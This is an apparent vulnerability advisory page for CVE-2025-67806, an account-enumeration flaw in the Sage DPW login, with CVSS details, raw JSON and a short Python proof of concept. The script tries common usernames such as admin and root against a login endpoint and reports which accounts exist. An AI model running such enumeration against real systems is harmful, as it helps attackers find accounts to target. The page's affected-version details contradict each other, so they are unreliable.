Security Vulnerability Report
中文
CVE-2025-67806 CVSS 3.7 LOW

CVE-2025-67806

Published: 2026-04-01 16:23:48
Last Modified: 2026-05-10 14:16:46

Description

The login mechanism of Sage DPW 2021_06_004 displays distinct responses for valid and invalid usernames, allowing enumeration of existing accounts in versions before 2021_06_000. On-premise administrators can toggle this behavior in newer versions.

CVSS Details

CVSS Score
3.7
Severity
LOW
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:sagedpw:sage_dpw:2025_06_004:*:*:*:*:*:*:* - VULNERABLE
Sage DPW < 2021_06_000

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Target URL for the login endpoint target_url = "https://target-sage-dpw.example.com/login" # List of usernames to enumerate usernames = ["admin", "administrator", "test", "user", "root"] print("Starting username enumeration...") for user in usernames: # Payload with specific username and a dummy password payload = { "username": user, "password": "InvalidPassword123!" } try: # Send POST request to the login endpoint response = requests.post(target_url, data=payload) # Analyze the response for differences # Logic depends on specific application behavior # Example: Checking for specific error messages or status codes if "User does not exist" in response.text or response.status_code == 404: print(f"[-] User not found: {user}") elif "Invalid password" in response.text or response.status_code == 401: print(f"[+] Valid username found: {user}") else: print(f"[?] Unclear response for {user}: Status {response.status_code}") except requests.RequestException as e: print(f"[!] Error connecting to server: {e}") print("Enumeration completed.")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67806", "sourceIdentifier": "[email protected]", "published": "2026-04-01T16:23:48.323", "lastModified": "2026-05-10T14:16:46.130", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "The login mechanism of Sage DPW 2021_06_004 displays distinct responses for valid and invalid usernames, allowing enumeration of existing accounts in versions before 2021_06_000. On-premise administrators can toggle this behavior in newer versions."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 3.7, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-203"}]}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-204"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:sagedpw:sage_dpw:2025_06_004:*:*:*:*:*:*:*", "matchCriteriaId": "633B447B-E044-4548-9D21-E82129683125"}]}]}], "references": [{"url": "https://pastebin.com/Tk4LgMG2", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.sagedpw.at/", "source": "[email protected]", "tags": ["Product"]}]}}